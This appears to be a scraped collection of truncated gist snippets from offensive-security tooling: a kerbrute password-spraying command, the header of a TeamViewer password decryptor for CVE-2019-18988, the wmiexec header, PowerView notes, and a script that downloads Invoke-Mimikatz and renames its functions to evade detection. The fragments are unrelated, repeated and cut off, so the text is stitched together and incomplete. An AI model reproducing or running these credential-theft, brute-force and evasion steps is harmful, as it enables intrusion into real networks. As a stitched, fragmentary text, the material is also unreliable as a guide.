With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/usr/bin/env python3 | |
# Decrypt Teamviewer Passwords from exported registry file | |
# Usage: python tvd.py Teamviewer_Settings.reg | |
# Modified by readmeexe | |
# | |
# CVE-2019-18988 | |
# Original Author @whynotsecurity | |
# https://whynotsecurity.com/blog/teamviewer/ | |
import sys, hexdump, binascii |
# --------------------------------------------------- | |
# Load the Active Directory PowerShell module | |
# --------------------------------------------------- | |
# $ADModuleBytes = [System.IO.File]::ReadAllBytes("C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.ActiveDirectory.Management.dll") | |
# $ADModuleString = [System.Convert]::ToBase64String($ADModuleBytes) | |
# Set the string |
#!/usr/bin/env python | |
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
# | |
# This software is provided under under a slightly modified version | |
# of the Apache Software License. See the accompanying LICENSE file | |
# for more information. | |
# | |
# A similar approach to smbexec but executing commands through WMI. | |
# Main advantage here is it runs under the user (has to be Admin) | |
# account, not SYSTEM, plus, it doesn't generate noisy messages |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/bin/bash | |
# Nmap can crash when scanning large ranges | |
# To use this script, start your scan with whatever | |
# nmap options you want making sure you use -oA <filename> | |
# or -oG <filename> (you need the gnmap file) then cancel | |
# the scan. replace <filename> below and run this script. | |
# It will also record when it failed to a file called failed.txt | |
until nmap --resume <filename>.gnmap |
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
# Save this file into something like /etc/apache2/redirect.rules. | |
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
# | |
# Include /etc/apache2/redirect.rules | |
# |
# twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API | |
# limits, so if you have a gazillion favorites, you probably won't get them all. YMMV | |
# | |
# Author: @curi0usJack | |
# | |
# Dependencies: | |
# Tweepy: sudo pip install tweepy | |
# Twitter API access. Set up here: https://apps.twitter.com/ | |
import tweepy |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
# Uncomment below two lines to clean comments from all .ps1 files in ./ | |
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \; | |
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \; | |
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1 | |
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1 | |
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1 |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
#DISCLAIMER | |
#I'm not the original author of the script... | |
#Original git repo vanished | |
function String-to-ByteArray ($String) | |
{ | |
$ByteArray=@() | |
For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
{ | |
$Chars=$String.Substring($i*2,2) |